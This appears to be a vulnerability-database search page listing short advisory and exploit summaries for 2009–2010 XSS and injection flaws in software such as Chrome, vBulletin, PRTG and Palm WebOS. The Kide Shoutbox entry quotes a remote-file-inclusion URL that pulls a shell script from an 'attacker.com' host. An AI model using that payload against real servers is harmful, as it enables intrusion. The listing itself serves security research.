4978 matches found
CVE-2010-0541 Ruby WEBrick javascript injection flaw
Cross-site scripting (XSS) vulnerability in the WEBrick HTTP server in Ruby in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote attackers to inject arbitrary web script or HTML via a crafted URI that triggers a UTF-7 error page...
Paessler - PRTG Traffic Grapher XSS
aushack.com - Vulnerability Advisory. Release Date: 08-Jun-2010. Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...
Paessler PRTG Traffic Grapher 6.2.1.945 Cross Site Scripting
aushack.com - Vulnerability Advisory. Release Date: 08-Jun-2010. Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...
Google Chrome 4.1.249.1059 Cross Origin Bypass
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL) CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663 Author: Jordi Chancel Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html Description: The Google URL Parsing...
leaftec CMS - Multiple Vulnerabilities
leaftec CMS - Multiple Vulnerabilities Exploit Title: leaftec cms multiple vulnerabilities Date: 21.03.2010 Author: Valentin Höbel Version: Tested on: Debian etch CVE : Code : :: General information :: leaftec cms multiple vulnerabilities discovered :: by Valentin Höbel :: [email protected] ...
Vbulletin Blog 4.0.2 XSS Vulnerability
Exploit for php platform in category web applications. Vbulletin Blog 4.0.2 XSS Vulnerability. Author: FormatXformat Version: Vbulletin 4.0.2 Dork: Powered by vBulletin Version 4.0.2 Copyright 2010 vBulletin Solutions, In...
Silverstripe CMS 2.3.4 Cross Site Scripting
Silverstripe CMS, version 2.3.4 and lower and its unreleased 2.4 branch, is vulnerable to two Cross Site Scripting issues. 1. The comment posting mechanism of Silverstripe 'PostCommentForm' fails to properly sanitize the 'CommenterURL' parameter...
FDF Files Containing Timed JavaScript (CVE-2009-3956)
FDF is a file format used for representing form data and annotations that are contained in a PDF form. A remote attacker may exploit this issue to inject JavaScript into a PDF file from any domain on the internet. When Acrobat loads an FDF file, there is no check to ensure that the target file,...
2009 You! Hostit! XSS
No description provided by source. andresg888 Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example:...
DPI 1.1-final Powered by Clixint XSS
No description provided by source. andresg888 Vendor : http://www.image-host-script.com/ Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example1:...
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR
Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...
Fedora Core 10 FEDORA-2009-10377 (python-markdown2)
The remote host is missing an update to python-markdown2 announced via advisory FEDORA-2009-10377. OpenVAS Vulnerability Test $Id: fcore200910377.nasl 6624 2017-07-10 06:11:55Z cfischer $ Description: Auto-generated from advisory FEDORA-2009-10377 python-markdown2 Authors: Thomas Reinke Copyright...
Fedora Core 11 FEDORA-2009-10329 (python-markdown2)
The remote host is missing an update to python-markdown2 announced via advisory FEDORA-2009-10329. Note: This VT has been deprecated and is therefore no longer functional. SPDX-FileCopyrightText: 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyrig...
Fedora 11 : python-markdown2-1.0.1.15-1.fc11 (2009-10329)
Update from 1.0.1.11 to 1.0.1.15, which fixes some issues, including these two security-related bugs: - Issue 30: Fix a possible XSS via JavaScript injection in a carefully crafted image reference (usage of double-quotes in the URL). - Issue 29: Fix security hole in the md5-hashing scheme for handlin...
Palm Pre WebOS <=1.1 Remote File Access Vulnerability
I. Description The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+. Palm WebOS 1.2 patch information can be...
Palm Pre WebOS <=1.1 Remote File Access Vulnerability
No description provided by source. I. Description The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+. Palm...
Palm Pre WebOS 1.1 - Remote File Access
I. Description The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+. Palm WebOS 1.2 patch information can be...
Palm Pre WebOS 1.1 - Remote File Access
Palm Pre WebOS 1.1 - Remote File Access I. Description The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Palm has patched this vulnerability and all users are recommended to upgrade to WebOS version 1.2+...
Google Chrome < 3.0.195.21 Multiple Vulnerabilities
The version of Google Chrome installed on the remote host is earlier than 3.0.195.21. Such versions are reportedly affected by multiple issues : - Google Chrome's inbuilt RSS/ATOM reader renders untrusted JavaScript in an RSS/ATOM feed. Provided a victim connects to a RSS/ATOM feed link controlle...
Update Protection against Joomla! HTTP Header Script Injection
Joomla! is a content management system (CMS) designed for building Web sites and online applications. Joomla! fails to parse HTTP headers, allowing an attacker to inject JavaScript or DHTML code that can be executed in the context of a target user browser...